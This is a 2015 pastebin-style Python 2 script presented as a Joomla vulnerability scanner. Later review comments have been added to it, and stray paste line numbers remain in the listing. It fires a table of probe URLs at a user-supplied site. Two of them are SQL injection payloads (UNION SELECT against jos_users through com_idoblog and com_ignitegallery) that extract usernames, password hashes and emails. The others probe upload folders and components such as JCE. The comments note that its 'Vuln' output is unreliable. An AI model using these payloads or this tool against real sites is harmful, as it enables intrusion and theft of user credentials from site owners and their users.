Kro0oz

#python sc4nn3r Joomla

Aug 22nd, 2015
#!/usr/bin/python
# By Kro0oz
#
# Python 2 script (print statements, httplib/urllib2). It sends one HEAD
# request per entry of a fixed table of Joomla URLs and reports every entry
# whose HTTP status is not 400, 401 or 404.

import sys
import urllib2  # imported by the original; not referenced in this listing
import time
import httplib

# Neither value is read anywhere in this listing; `dzx` is rebound to the
# probe table further down before anything uses it.
mtucx = 5
dzx = 4

# Banner text, kept verbatim. The literal is not a raw string, so a backslash
# that ends a row directly before the newline acts as a line continuation
# (NOTE(review): this looks like it affects the fourth art row; confirm
# against the original file, where trailing whitespace may differ).
logo = '''




__  __      _  __           ___             ____   ___  _____
|  \/  |    | |/ /          / _ \          |___ \ / _ \| ____|
| \ / |_ __| ' / _ __ ___ | | | | ___ ____   __) | | | | |__  
| |\/| | '__|  < | '__/ _ \| | | |/ _ \_  /  |__ <| | | |___ \
| |  | | | _| . \| | | (_) | |_| | (_) / / _ ___) | |_| |___) |
|_|  |_|_|(_)_|\_\_|  \___/ \___/ \___/___(_)____/ \___/|____/
     
   
                        -Joomla scanner #By ~ Kro0oz
                                                           

                                     



'''

print logo

# Title, greeting and usage hint, printed on every run (text as in the
# original, including its spelling).
print "\n".join([
    "Joomla Scanner ",
    "Greetz to : dexter ",
    "pyhthon joomla.py www.test.com",
])

# Statuses counted as "not there". Every other status (200, 3xx, 403, 5xx, ...)
# is reported as a hit by the loop at the bottom of the script, so a hit only
# means "the server answered something else", not a confirmed finding.
BAD_RESP = [400, 401, 404]
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
def main(path):
    """Send one HEAD request for `path` below the global `host`.

    `host` is the module-level string "<netloc>/<base path>/" built by the
    driver code at the bottom of the script. The request goes over plain HTTP
    through the legacy Python 2 `httplib.HTTP` class.

    Returns a tuple (status code, reason phrase, value of the Server header).
    Only the status line and headers are used; no response body is read, so
    the caller cannot tell from this result whether a component is actually
    installed or affected.
    """
    parts = host.split("/", 1)
    netloc = parts[0]
    target = parts[1] + path

    print "Scan:", target

    try:
        conn = httplib.HTTP(netloc)
        conn.putrequest("HEAD", "/" + target)
        conn.putheader("Host", netloc)
        conn.endheaders()

        status, reason, headers = conn.getreply()
        return status, reason, headers.get("Server")

    # NOTE(review): an empty tuple of exception classes matches no exception,
    # so this handler never runs and any connection or protocol error
    # propagates to the caller. If it did run, the function would fall through
    # and return None, which the caller's three-way unpacking cannot accept.
    except (), msg:
        print "Error Occurred:", msg
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
def timer():
    """Return the current local time as an `asctime`-style string.

    Not called anywhere in the visible listing.
    """
    return time.asctime(time.localtime())
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
# Probe table: request path (relative to the target's base path) -> label(s)
# printed when the probe is counted as a hit.
#
# The first two entries carry UNION SELECT strings against `jos_users` in the
# query string; the remaining entries are plain component URLs or a directory
# path. Each entry is sent as a HEAD request and only the status code is
# inspected, so no entry ever shows whether the query string had any effect.
#
# NOTE(review): for defenders, these strings are what this tool puts on the
# request line, so they are the patterns to look for in web-server access logs
# and WAF events (HEAD requests carrying "union+select" / "jos_users").
dzx = {
    "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--": ["com_idoblog"],
    "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--": ["com_ignitegallery"],
    "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=": ["com_media"],
    "administrator/components/com_redmystic/chart/tmp-upload-images/": ["com_redmystic"],
    "index.php?option=com_users&view=registration": ["com_user"],
    "index.php?option=com_jce": ["JCE", "link"],
    "index.php?option=com_user&view=reset&layout=confirm": ["com_user"],
    "index.php?option=com_smartformer": ["com_smartformer"],
    "index.php?option=com_garyscookbook&func=newItem": ["com_garyscookbook"],
    "index.php/component/osproperty/?task=agent_register": ["com_osproperty"],
}

# Exactly one command-line argument (the target) is required; anything else
# ends the script with exit status 1 and no further message.
if len(sys.argv) != 2:
    sys.exit(1)

# Only a literal "http://" is removed from the argument, and `main` speaks
# plain HTTP. rsplit keeps everything before the last "/", so a trailing path
# component without a closing slash is dropped.
host = sys.argv[1].replace("http://", "")
host = host.rsplit("/", 1)[0]

# `main` splits `host` on the first "/", so make sure one is present.
if host[-1] != "/":
    host += "/"

print "\nTarget:", host
print "\nScanning Exploit\n"

for xpl, poc in dzx.items():
    # `server` (the Server response header) is unpacked but never used.
    resp, reason, server = main(xpl)

    print ""
    print "\nResult:", resp, reason

    # NOTE(review): the label is printed for every status outside BAD_RESP,
    # including redirects, 403 and 5xx. It is not evidence that the component
    # exists or is vulnerable.
    if resp in BAD_RESP:
        print
    else:
        print "\nVuln", poc

print "\nEnd\n"